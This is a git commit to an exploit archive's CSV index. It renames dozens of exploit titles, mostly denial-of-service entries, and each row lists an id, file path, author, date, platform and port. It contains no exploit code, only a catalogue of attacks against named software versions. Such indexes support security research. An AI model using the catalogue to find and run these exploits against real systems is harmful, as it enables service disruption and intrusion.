DB: 2017-10-12
5 new exploits MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities Apple Safari & QuickTime - Denial of Service Apple Safari / QuickTime - Denial of Service Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption Mozilla Firefox - Interleaving document.write and appendChild Denial of Service Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service BRS Webweaver 1.0 4 - POST and HEAD Denial of Service BRS Webweaver 1.0 4 - POST / HEAD Denial of Service Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035) Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035) Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097) Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097) Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017) Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017) Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow BSD & Linux umount - Privilege Escalation BSD / Linux - 'umount' Privilege Escalation BSD & Linux lpr - Privilege Escalation BSD / Linux - 'lpr' Privilege Escalation DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass) ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass) ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow Microsoft Windows - WINS Vulnerability and OS/SP Scanner Microsoft Windows - WINS Vulnerability + OS/SP Scanner Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild) Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit) Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit) Quest InTrust 10.4.x - ReportTree and SimpleTree Classes Quest InTrust 10.4.x - ReportTree / SimpleTree Classes SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files tcpdump 3.4 - Protocol Four and Zero Header Length tcpdump 3.4 - Protocol Four / Zero Header Length Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow EFTP Server 2.0.7.337 - Directory and File Existence EFTP Server 2.0.7.337 - Directory Existence / File Existence Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities Microsoft Windows XP - Help And Support Center Interface Spoofing Microsoft Windows XP - Help and Support Center Interface Spoofing BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit) BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit) Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting 3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal 3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read Github Enterprise - Default Session Secret And Deserialization (Metasploit) Github Enterprise - Default Session Secret and Deserialization (Metasploit) VX Search Enterprise 10.1.12 - Buffer Overflow QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion FlexPHPNews 0.0.6 & PRO - Authentication Bypass FlexPHPNews 0.0.6 / PRO - Authentication Bypass click&rank - SQL Injection / Cross-Site Scripting Click&Rank - SQL Injection / Cross-Site Scripting WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass Pre Hotels&Resorts Management System - Authentication Bypass PHP-Nuke CMS - (Survey and Poll) SQL Injection PHP-Nuke CMS (Survey and Poll) - SQL Injection 60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password) 60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password) XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin) Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin) Sun i-Runbook 2.5.2 - Directory And File Content Disclosure Sun i-Runbook 2.5.2 - Directory and File Content Disclosure DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection DUforum 3.x - 'messages.asp FOR_ID' SQL Injection DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion WordPress Plugin WP BackupPlus - Database And Files Backup Download WordPress Plugin WP BackupPlus - Database and Files Backup Download WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection Gogs - (users and repos q pararm) SQL Injection Gogs - users and repos q SQL Injection WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection Joomla! Component 'com_tree' - 'key' Parameter SQL Injection Joomla! Component com_tree - 'key' Parameter SQL Injection Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities TOTOLINK Routers - Backdoor and Remote Code Execution (PoC) TOTOLINK Routers - Backdoor / Remote Code Execution (PoC) up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit up.time 7.5.0 - Upload And Execute File Exploit up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit up.time 7.5.0 - Upload and Execute Exploit Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit) Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
This commit is contained in:
parent
b77b178de0
commit
3cfdd1cc27
8 changed files with 737 additions and 86 deletions
173
files.csv
173
files.csv
|
@ -227,7 +227,7 @@ id,file,description,date,author,platform,type,port
|
|||
1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos,0
|
||||
1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0
|
||||
1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0
|
||||
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
|
||||
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
|
||||
1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos,0
|
||||
1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,windows,dos,0
|
||||
1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0
|
||||
|
@ -927,7 +927,7 @@ id,file,description,date,author,platform,type,port
|
|||
7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
|
||||
7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
|
||||
7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
|
||||
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
|
||||
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
|
||||
7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0
|
||||
7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0
|
||||
7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0
|
||||
|
@ -1073,7 +1073,7 @@ id,file,description,date,author,platform,type,port
|
|||
8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0
|
||||
8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",multiple,dos,0
|
||||
8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0
|
||||
8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
|
||||
8957,platforms/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
|
||||
8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0
|
||||
8964,platforms/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0
|
||||
8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0
|
||||
|
@ -1116,7 +1116,7 @@ id,file,description,date,author,platform,type,port
|
|||
9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0
|
||||
9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
|
||||
9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
|
||||
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
|
||||
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
|
||||
9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0
|
||||
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0
|
||||
9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0
|
||||
|
@ -1242,7 +1242,7 @@ id,file,description,date,author,platform,type,port
|
|||
10068,platforms/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
|
||||
10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21
|
||||
10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
|
||||
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
|
||||
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
|
||||
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
|
||||
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
|
||||
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
|
||||
|
@ -1317,7 +1317,7 @@ id,file,description,date,author,platform,type,port
|
|||
10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Exploit",2010-01-02,"fl0 fl0w",windows,dos,0
|
||||
10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,hardware,dos,0
|
||||
10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0
|
||||
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
|
||||
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
|
||||
11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
|
||||
11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0
|
||||
11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0
|
||||
|
@ -1395,7 +1395,7 @@ id,file,description,date,author,platform,type,port
|
|||
11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0
|
||||
11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0
|
||||
11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0
|
||||
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
|
||||
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
|
||||
11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0
|
||||
11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0
|
||||
11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0
|
||||
|
@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port
|
|||
14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
|
||||
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
|
||||
14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0
|
||||
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
|
||||
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
|
||||
14282,platforms/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
|
||||
14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0
|
||||
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
|
||||
|
@ -1709,7 +1709,7 @@ id,file,description,date,author,platform,type,port
|
|||
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
|
||||
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
|
||||
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
|
||||
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
|
||||
14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0
|
||||
14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0
|
||||
14987,platforms/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0
|
||||
|
@ -1769,7 +1769,7 @@ id,file,description,date,author,platform,type,port
|
|||
15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
|
||||
15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0
|
||||
15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
|
||||
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
|
||||
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
|
||||
15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0
|
||||
15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0
|
||||
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0
|
||||
|
@ -2451,7 +2451,7 @@ id,file,description,date,author,platform,type,port
|
|||
20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0
|
||||
20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0
|
||||
20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0
|
||||
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
|
||||
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
|
||||
20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",hardware,dos,0
|
||||
20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0
|
||||
20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,hardware,dos,0
|
||||
|
@ -2868,14 +2868,14 @@ id,file,description,date,author,platform,type,port
|
|||
22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,windows,dos,0
|
||||
22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos,0
|
||||
22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0
|
||||
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
|
||||
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST / HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
|
||||
22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",windows,dos,0
|
||||
22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash (PoC)",2012-11-12,coolkaveh,windows,dos,0
|
||||
22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0
|
||||
22666,platforms/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,windows,dos,0
|
||||
22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos,0
|
||||
22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos,0
|
||||
22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
|
||||
